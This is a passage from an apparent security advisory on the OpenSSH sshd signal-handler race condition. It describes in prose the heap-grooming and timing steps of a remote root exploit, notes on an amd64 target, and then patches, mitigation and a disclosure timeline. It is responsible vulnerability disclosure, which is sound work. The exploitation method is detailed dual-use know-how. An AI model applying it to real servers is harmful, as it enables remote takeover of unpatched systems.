 993 | packets to sshd (packets a/ to d/ can be sent long before SIGALRM; most
 994 | of packet e/ can also be sent long before SIGALRM, but its very last
 995 | byte must be sent at the very last moment):
 996 | 
 997 | a/ We malloc()ate and free() a variety of tcache chunks, to ensure that
 998 | the heap allocations that we do not control end up in these tcache
 999 | chunks and do not interfere with our careful heap layout.
1000 | 
1001 | b/ We malloc()ate and free() chunks of various sizes, to make our 27
1002 | pairs of large and small holes (and the corresponding "barrier" chunks).
1003 | 
1004 | c/ We malloc()ate and free() ~4KB chunks and 320B chunks, to:
1005 | 
1006 | - write the fake header (the large size field) of our potentially
1007 |   enlarged remainder chunk, into the middle of our large holes;
1008 | 
1009 | - write the fake footer of our potentially enlarged remainder chunk, to
1010 |   the end of our small holes (to pass the glibc's security checks);
1011 | 
1012 | - write our fake vtable and _codecvt pointers, into our small holes
1013 |   (which are potential FILE structures).
1014 | 
1015 | d/ We malloc()ate and free() one very large string (nearly 256KB), to
1016 | ensure that our large and small holes are removed from the unsorted list
1017 | of free chunks and placed into their respective malloc bins.
1018 | 
1019 | e/ We force sshd to perform our final sequence of malloc() calls
1020 | (malloc(~4KB), malloc(304), malloc(~4KB), malloc(304), etc), to open our
1021 | 27 small race windows.
1022 | 
1023 | Attentive readers may have noticed that we have still not addressed
1024 | (literally and figuratively) the problem of _codecvt. In fact, _codecvt
1025 | is a pointer to a structure (_IO_codecvt) that contains a pointer to a
1026 | structure (__gconv_step) that contains the __fct function pointer that
1027 | allows us to execute arbitrary code. To reliably control __fct through
1028 | _codecvt, we simply point _codecvt to one of the glibc's malloc bins,
1029 | which conveniently contains a pointer to one of our free chunks in the
1030 | heap, which contains our own __fct function pointer to arbitrary glibc
1031 | code (all of these glibc addresses are known to us, because we assume
1032 | that the glibc is mapped at address 0xb7400000).
1033 | 
1034 | ------------------------------------------------------------------------
1035 | Timing
1036 | ------------------------------------------------------------------------
1037 | 
1038 |     We're running out of time
1039 |         -- The Interrupters, "As We Live"
1040 | 
1041 | As we implemented this third exploit, it became clear that we could not
1042 | simply re-use the timing strategy that we had used against the two older
1043 | OpenSSH versions: we were never winning this new race condition.
1044 | Eventually, we understood why:
1045 | 
1046 | - It takes a long time (~10ms) for sshd to parse our fifth and last
1047 |   public key (packet e/ above); in other words, our large race window is
1048 |   too large (our 27 small race windows are like needles in a haystack).
1049 | 
1050 | - The user_specific_delay() that was introduced recently (OpenSSH 7.8p1)
1051 |   delays sshd's response to our last public-key packet by up to ~9ms and
1052 |   therefore destroys our feedback-based timing strategy.
1053 | 
1054 | As a result, we developed a completely different timing strategy:
1055 | 
1056 | - from time to time, we send our last public-key packet with a little
1057 |   mistake that produces an error response (lines 138-142 below), right
1058 |   before the call to sshkey_from_blob() that parses our public key;
1059 | 
1060 | - from time to time, we send our last public-key packet with another
1061 |   little mistake that produces an error response (lines 151-155 below),
1062 |   right after the call to sshkey_from_blob() that parses our public key;
1063 | 
1064 | - the difference between these two response times is the time that it
1065 |   takes for sshd to parse our last public key, and this allows us to
1066 |   precisely time the transmission of our last packets (to ensure that
1067 |   sshd has the time to parse our public key in the unprivileged child,
1068 |   send it to the privileged child, and start to parse it there, before
1069 |   the delivery of SIGALRM).
1070 | 
1071 | ------------------------------------------------------------------------
1072 |  88 userauth_pubkey(struct ssh *ssh, const char *method)
1073 |  89 {
1074 | ...
1075 | 138         if (pktype == KEY_UNSPEC) {
1076 | 139                 /* this is perfectly legal */
1077 | 140                 verbose_f("unsupported public key algorithm: %s", pkalg);
1078 | 141                 goto done;
1079 | 142         }
1080 | 143         if ((r = sshkey_from_blob(pkblob, blen, &key)) != 0) {
1081 | 144                 error_fr(r, "parse key");
1082 | 145                 goto done;
1083 | 146         }
1084 | ...
1085 | 151         if (key->type != pktype) {
1086 | 152                 error_f("type mismatch for decoded key "
1087 | 153                     "(received %d, expected %d)", key->type, pktype);
1088 | 154                 goto done;
1089 | 155         }
1090 | ------------------------------------------------------------------------
1091 | 
1092 | With this change in strategy, it takes ~10,000 tries on average to win
1093 | the race condition; i.e., with 100 connections (MaxStartups) accepted
1094 | per 120 seconds (LoginGraceTime), it takes ~3-4 hours on average to win
1095 | the race condition, and ~6-8 hours to obtain a remote root shell
1096 | (because of ASLR).
1097 | 
1098 | 
1099 | ========================================================================
1100 | Towards an amd64 exploit
1101 | ========================================================================
1102 | 
1103 |     What's your plan for tomorrow?
1104 |         -- The Interrupters, "Take Back the Power"
1105 | 
1106 | We decided to target Rocky Linux 9 (a Red Hat Enterprise Linux 9
1107 | derivative), from "Rocky-9.4-x86_64-minimal.iso", for two reasons:
1108 | 
1109 | - its OpenSSH version (8.7p1) is vulnerable to this signal handler race
1110 |   condition and its glibc is always mapped at a multiple of 2MB (because
1111 |   of the ASLR weakness discussed in the previous "Theory" subsection),
1112 |   which makes partial pointer overwrites much more powerful;
1113 | 
1114 | - the syslog() function (which is async-signal-unsafe but is called by
1115 |   sshd's SIGALRM handler) of this glibc version (2.34) internally calls
1116 |   __open_memstream(), which malloc()ates a FILE structure in the heap,
1117 |   and also calls calloc(), realloc(), and free() (which gives us some
1118 |   much-needed freedom).
1119 | 
1120 | With a heap corruption as a primitive, two FILE structures malloc()ated
1121 | in the heap, and 21 fixed bits in the glibc's addresses, we believe that
1122 | this signal handler race condition is exploitable on amd64 (probably not
1123 | in ~6-8 hours, but hopefully in less than a week). Only time will tell.
1124 | 
1125 | Side note: we discovered that Ubuntu 24.04 does not re-randomize the
1126 | ASLR of its sshd children (it is randomized only once, at boot time); we
1127 | tracked this down to the patch below, which turns off sshd's rexec_flag.
1128 | This is generally a bad idea, but in the particular case of this signal
1129 | handler race condition, it prevents sshd from being exploitable: the
1130 | syslog() inside the SIGALRM handler does not call any of the malloc
1131 | functions, because it is never the very first call to syslog().
1132 | 
1133 |   https://git.launchpad.net/ubuntu/+source/openssh/tree/debian/patches/systemd-socket-activation.patch
1134 | 
1135 | 
1136 | ========================================================================
1137 | Patches and mitigation
1138 | ========================================================================
1139 | 
1140 |     The storm has come and gone
1141 |         -- The Interrupters, "Good Things"
1142 | 
1143 | On June 6, 2024, this signal handler race condition was fixed by commit
1144 | 81c1099 ("Add a facility to sshd(8) to penalise particular problematic
1145 | client behaviours"), which moved the async-signal-unsafe code from
1146 | sshd's SIGALRM handler to sshd's listener process, where it can be
1147 | handled synchronously:
1148 | 
1149 |   https://github.com/openssh/openssh-portable/commit/81c1099d22b81ebfd20a334ce986c4f753b0db29
1150 | 
1151 | Because this fix is part of a large commit (81c1099), on top of an even
1152 | larger defense-in-depth commit (03e3de4, "Start the process of splitting
1153 | sshd into separate binaries"), it might prove difficult to backport. In
1154 | that case, the signal handler race condition itself can be fixed by
1155 | removing or commenting out the async-signal-unsafe code from the
1156 | sshsigdie() function; for example:
1157 | 
1158 | ------------------------------------------------------------------------
1159 | sshsigdie(const char *file, const char *func, int line, int showfunc,
1160 |     LogLevel level, const char *suffix, const char *fmt, ...)
1161 | {
1162 | #if 0
1163 |         va_list args;
1164 | 
1165 |         va_start(args, fmt);
1166 |         sshlogv(file, func, line, showfunc, SYSLOG_LEVEL_FATAL,
1167 |             suffix, fmt, args);
1168 |         va_end(args);
1169 | #endif
1170 |         _exit(1);
1171 | }
1172 | ------------------------------------------------------------------------
1173 | 
1174 | Finally, if sshd cannot be updated or recompiled, this signal handler
1175 | race condition can be fixed by simply setting LoginGraceTime to 0 in the
1176 | configuration file. This makes sshd vulnerable to a denial of service
1177 | (the exhaustion of all MaxStartups connections), but it makes it safe
1178 | from the remote code execution presented in this advisory.
1179 | 
1180 | 
1181 | ========================================================================
1182 | Acknowledgments
1183 | ========================================================================
1184 | 
1185 | We thank OpenSSH's developers for their outstanding work and close
1186 | collaboration on this release. We also thank the distros@openwall.
1187 | Finally, we dedicate this advisory to Sophia d'Antoine.
1188 | 
1189 | 
1190 | ========================================================================
1191 | Timeline
1192 | ========================================================================
1193 | 
1194 | 2024-05-19: We contacted OpenSSH's developers. Successive iterations of
1195 | patches and patch reviews followed.
1196 | 
1197 | 2024-06-20: We contacted the distros@openwall.
1198 | 
1199 | 2024-07-01: Coordinated Release Date.


--------------------------------------------------------------------------------